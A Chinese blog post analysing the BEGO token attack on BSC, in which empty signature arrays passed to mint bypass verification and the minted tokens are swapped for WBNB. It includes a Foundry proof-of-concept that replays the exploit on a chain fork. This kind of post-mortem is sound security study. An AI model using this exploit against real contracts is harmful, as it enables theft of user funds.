参数检查漏洞——BEGO

最新推荐文章于 2024-08-15 16:41:36 发布
最新推荐文章于 2024-08-15 16:41:36 发布
阅读量167 收藏
点赞数
分类专栏: 链上安全事件分析 文章标签: 区块链 智能合约 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78046362/article/details/130835138
版权
文章详细描述了一次针对BSC上智能合约的攻击事件,攻击者在mint代币时传入空的RSV值,绕过签名验证,成功获取了12个WBNB。攻击流程包括调用合约的mint方法,使用PancakeSwapV2进行代币兑换。文章提醒开发者要对输入参数进行严格检查,防止类似攻击。
摘要由CSDN通过智能技术生成

文章目录


攻击者通过在mint代币的时候,传入空的rsv来绕开签名的检查,获取12个WBNB的利润

事件基本情况

tx: 0x9f4ef3cc55b016ea6b867807a09f80d1b2e36f6cd6fccfaf0182f46060332c57
区块链:bsc
发送者: 0xde01f6ce91e4f4bdb94bb934d30647d72182320f
受害者: 0xc342774492b54ce5F8ac662113ED702Fc1b34972
攻击合约: 0x08a525104ea2a92abbce8e4e61c667eed56f3b42
调用函数: 0x28b5e32b
区块高度: 22315680
漏洞点:不恰当的函数逻辑。

hacker攻击流程

  1. 调用BEGO的mint方法,传入的rsv为空,可以绕开合约签名的检查。并将接收者设置为PancakeSwap V2: BGEO。
  2. 用PancakeSwap V2: BGEO的swap将BEGO兑换为WBNB发送给sender

流程图如下
请添加图片描述

漏洞方法如图
请添加图片描述

攻击点复刻方式

  1. 创建攻击合约
  2. 在攻击方法中调用mint,传入空的rsv
  3. 将mint的BEGO去兑换为WBNB

攻击模拟结果图

请添加图片描述

事件总结

一定要对传入的参数进行特殊性检查,防止被黑客利用

攻击代码

// SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.8.10;

import "forge-std/Test.sol";

import "./UniversalInterface.sol";
  
// 定义常量

IERC20 constant WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
address constant BEGO = 0xc342774492b54ce5F8ac662113ED702Fc1b34972;
IPancakeRouter02 constant Router = IPancakeRouter02(0x10ED43C718714eb63d5aA57B78B54704E256024E);
uint256 constant BlockNumber = 22315679;


// 定义接口

interface BEGOERC20 {

        function mint(
        uint256 _amount,
        string memory _txHash,
        address _receiver,
        bytes32[] memory _r,
        bytes32[] memory _s,
        uint8[] memory _v
    ) external;
}


// 攻击合约
contract Exploit is Test{

// 设置攻击环境
    function setUp() public {
        vm.createSelectFork("bsc", BlockNumber);
    }

// 攻击函数
    function testAttack() public {
        // 攻击前WBNB
        console.log("WBNB owned before attack:",WBNB.balanceOf(address(this)));
        bytes32 [] memory _r = new bytes32[](0);
        bytes32 [] memory _s = new bytes32[](0);
        uint8 [] memory _v = new uint8[](0);

        BEGOERC20(BEGO).mint(1000000000000000000000000000000, "t", address(this), _r, _s, _v);

        BEGOToWBNB();

        // 攻击后WBNB
        console.log("WBNB owned before attack:",WBNB.balanceOf(address(this)));

    }

    function BEGOToWBNB() internal {

        IERC20(BEGO).approve(address(Router), type(uint).max);
        address[] memory path = new address[](2);
        path[0] = address(BEGO);
        path[1] = address(WBNB);
        Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
            IERC20(BEGO).balanceOf(address(this)),
            0,
            path,
            address(this),
            block.timestamp
        );
    }
}

感觉对有帮助的可以点个赞,谢谢♥;如果喜欢的话可以订阅,我会持续更新合约漏洞事件。

陵野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bego:用于简单DynamoDb查询PHP库
02-04
class Music extends Bego\Model { /** * Table name */ protected $_name = 'Music'; /** * Table's partition key attribute */ protected $_partition = 'Artist'; /** * Table's sort key a
pancakeswap 开盘抢跑机器人 (附代码)
bareape的博客
04-30 8583
这个机器人主要就是抢跑用的:机器人一次只能狙击一个令牌。 如何运行 1. 拷贝代码 2. $ npm 安装 3. 复制你的 env.example到 .env 4. 使用以下说明设置您的 .env: WBNB_CONTRACT=0xbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c 购买代币的 WBNB 合约 FACTORY=0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73 Pancake Factory 合约获
二次开发uniswap-01-SDK
【03】的博客
03-11 2286
实现一个swap
机器人管家
jackbon8的博客
06-03 471
对关注的事务及时提醒 更多专注生活 本功能根据钉钉开发 <?php //钉钉机器人API function request_by_curl($remote_server, $post_string) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $remote_server); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_CONNE
蜜蜂:Bee是使用bego应用程序框架帮助开发的工具
02-04
蜜蜂 Bee是一种命令行工具,可促进基于Beego的应用程序的开发。 要求 转到版本> = 1.13 安装 要安装bee , go get使用go get命令: ... 然后,您可以添加bee在你的二进制PATH环境变量~/.bashrc或~/.bash_profile的文件...
begona-nscreen:硕士论文 Begoña Álvarez
06-23
# 基于浏览器的社交 N 屏幕平台的原型设计 - 硕士论文 - LOCALHOST SOURCE-CODE 这是一个基于 Web 的应用程序,它允许多人访问浏览器中的 URL,在彼此之间拖放程序,并进行拖放并将节目放到“VirtualTV”上播放。...
beegodynamicvalidation:用于调用bego的相当hacky的解决方案,它通过字符串标识符而不是显式标识符或struct标记进行验证
05-04
Beego动态验证用于调用bego的相当hacky的解决方案通过字符串标识符而不是显式标识符或struct标记进行验证。 用法示例: import bdv "github....
实现Bee Framework的MVC应用快速开发框架
04-01
该源码实现Bee Framework的MVC应用快速开发框架,不但可以分层架构如何设计,还可以层与层之间消息传递与处理等,是一个不错的ios学习的例子,喜欢的朋友可以下载学习看看,。
区块链+金融服务】供应链金融平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 185
四方精创基于 FISCO BCOS 设计了供应链金融平台,利用区块链多中心、不可篡改、不可抵赖、可追溯的特性, 在供应链生态企业间实现信用传递。
Web3入门指南:了解去中心化互联网的基础知识
最新发布
weixin_44672358的博客
08-15 389
Web3作为互联网的未来发展方向,正在引领着数字化时代的新篇章。通过去中心化、智能合约和数字身份技术,Web3不仅提升了互联网的安全性和隐私保护,还为金融、艺术和社交领域带来了新的应用机会。尽管面临技术复杂性、法规监管和网络安全等挑战,Web3技术的发展前景依然广阔。随着技术的不断演进和应用的逐步推广,Web3将为我们创造一个更加开放、公平和安全的数字世界。
区块链+金融服务】企链通金融服务平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 145
深圳市企企通科技积极响应国家政策,为企业引入基于 FISCO BCOS 区块链技术的供应链金融服务。
区块链和人工智能哪个更有前景?
加密社的博客
08-15 548
人工智能正在塑造当下,而区块链则锚定着未来的信任基石。
区块链+金融服务】机构间对账平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 128
机构间对账平台基于 FISCO BCOS 研发,将部分业务的资金信息和交易信息等作为副本旁路上链存储,用于微众银行与合作行的对账工作。
ITL-Internet Technology Letters
刘大猫
08-12 413
Internet Technology Letters本期旨在涵盖所有用于提高物联网性能的新兴或现代学习算法。在此背景下,我们打算收集有关物联网学习进展的研究论文。强烈鼓励与机器学习、计算智能、概率学习、统计学习、深度学习、联邦学习、因果关系、认知、强化学习、优化、区块链、5G/6G 或其他解决方案相关的论文,尤其是针对未来物联网应用的论文。
DeFi 协议应提供多类封装型比特币, wBTC 不应作为唯一选择
TechubNews的博客
08-14 568
孙宇晨在控制 TUSD 之后,其运营流程和透明度出现了恶化,前管理团队离职,实施储备金证明中断,在赎回服务中造成 TUSD 多次严重脱钩,以及孙宇晨关联的 RWA 项目声称持有美国国债储备,但没有提供明确的审计或者证据。上,已支持 wBTC 与 dlcBTC 交易品种,产品分为面向散户的,旨在降低准入门槛的日内到期期权,以及面向专业投资者的美式期权,提供实物交割模式和差额利润交割模式两种交割模式来适配持续上涨行情和震荡行情。近期,关于 wBTC 项目控制权转移的问题在社区内引起了广泛的讨论和担忧。
当前IT行业10大热门细分技术方向,哪一个更适合你?
文章主要涉及嵌入式软件开发、测试、项目管理等,欢迎交流,共同进步。
08-12 665
IT行业,即信息技术(Information Technology)行业,是一个广泛而多样的领域,涵盖了与信息的产生、收集、存储、处理、传输和应用相关的所有技术和服务。这个行业是现代社会中不可或缺的一部分,它利用计算机技术和通信技术来设计、开发、安装和实施信息系统及应用软件,以满足个人、企业和政府等组织的需求。广义上的IT行业划分范围很大,今天就来盘点一下,当前IT行业中有哪些比较热门的细分技术方向。以上就是当前IT行业10大热门细分技术方向,代表了当前IT行业的发展趋势。
重塑商业生态:技术驱动下的批发供应系统开发与革新
qq_27313987的博客
08-13 398
在当今这个快速变化的商业环境中,批发供应系统作为连接生产商、分销商与零售商的关键纽带,其效率与智能化水平直接影响着整个供应链的运作效率与市场竞争力。随着信息技术的飞速发展,特别是大数据、云计算、人工智能(AI)以及物联网(IoT)等前沿技术的深度融合,批发供应系统正经历着一场前所未有的技术革新,为传统商业模式带来了颠覆性的变化。
区块链+金融服务】中国银联区块链可信存证服务 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-14 866
中国银联充分发挥清算组织的平台角色,通过联通司法体系,以 FISCO BCOS 区块链技术为底层支撑,采取哈希 值校验、可信时间戳、电子签名和公证存证结合的方式构建区块链可信存证服务,为金融业务中的电子数据提供存证、出证、核验等能力,保障电子证据可用、可信、可靠,满足金融管理部门监督检查和司法机关调查取证的要求。
George Danezis谈为Sui开发Mysticeti
Sui_Network的博客
08-12 512
Mysten Labs的首席科学家解释了Mysticeti的开发过程及其对用户的意义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值